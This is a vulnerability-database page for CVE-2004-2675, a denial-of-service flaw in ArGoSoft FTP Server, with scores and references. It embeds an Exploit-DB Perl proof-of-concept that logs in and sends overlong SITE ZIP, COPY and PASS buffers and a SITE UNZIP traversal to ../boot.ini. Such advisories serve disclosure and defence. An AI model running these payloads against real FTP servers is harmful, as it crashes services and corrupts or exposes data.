CVE-2004-2675 : Detail

CVE-2004-2675

2.08%V3
Network
2007-01-09
20h00 +00:00
2017-07-28
10h57 +00:00
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

ArGoSoft FTP Server before 1.4.1.6 allows remote authenticated users to cause a denial of service (crash) via a SITE PASS command with a long password parameter, which causes the database to be corrupted.

CVE Informations

Metrics

Metrics Score Severity CVSS Vector Source
V2 6.8 AV:N/AC:L/Au:S/C:N/I:N/A:C [email protected]

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 23769

Publication date : 2004-02-26 23h00 +00:00
Author : Beyond Security
EDB Verified : Yes

source: https://www.securityfocus.com/bid/9770/info ArGoSoft has released version 1.4.1.6 of their FTP Server to address multiple unspecified security vulnerabilities. These issues include three buffer overruns when handling overly long FTP SITE ZIP and SITE COPY commands, a file enumeration issue involving the SITE UNZIP command and user database corruption denial of service attacks via the SITE PASS command. #!/usr/bin/perl # Multiple Vulnerabilities in ArGoSoft FTP Server version 1.4 (1.4.1.4) # Created by Beyond Security Ltd. - All rights reserved. use IO::Socket; $host = "192.168.1.243"; $remote = IO::Socket::INET->new ( Proto => "tcp", PeerAddr => $host, PeerPort => "2119",, ); unless ($remote) { die "cannot connect to ftp daemon on $host" } print "connected\n"; while (<$remote>) { print $_; if (/220 /) { last; } } $remote->autoflush(1); my $ftp = "USER username\r\n"; print $remote $ftp; print $ftp; sleep(1); while (<$remote>) { print $_; if (/331 /) { last; } } $ftp = join("", "PASS ", "password", "\r\n"); print $remote $ftp; print $ftp; sleep(1); while (<$remote>) { print $_; if (/230 /) { last; } } #$ftp = join ("", "SITE ZIP ", "A"x512, "\r\n"); #$ftp = join ("", "SITE ZIP storm.zip /f:", "A"x2048, "\r\n"); #$ftp = join ("", "SITE COPY ", "A"x2048, " ", "A"x10, "\r\n"); #$ftp = join ("", "SITE UNZIP ", "../boot.ini\r\n"); # Directory Traversal (we know a certain file exists) #$ftp = join ("", "SITE PASS ", "storm ", "A"x3500, "\r\n"); # DoS ... against the user database #Choose one of the above to test the vulnerabilities mentioned print $remote $ftp; print $ftp; sleep(1); while (<$remote>) { print $_; if (/250 Done/) { last; } } close $remote;

Products Mentioned

Configuraton 0

Argosoft>>Ftp_server >> Version To (including) 1.4.1.5

References

http://www.securityfocus.com/bid/9770
Tags : vdb-entry, x_refsource_BID
http://secunia.com/advisories/11002
Tags : third-party-advisory, x_refsource_SECUNIA
http://www.osvdb.org/11332
Tags : vdb-entry, x_refsource_OSVDB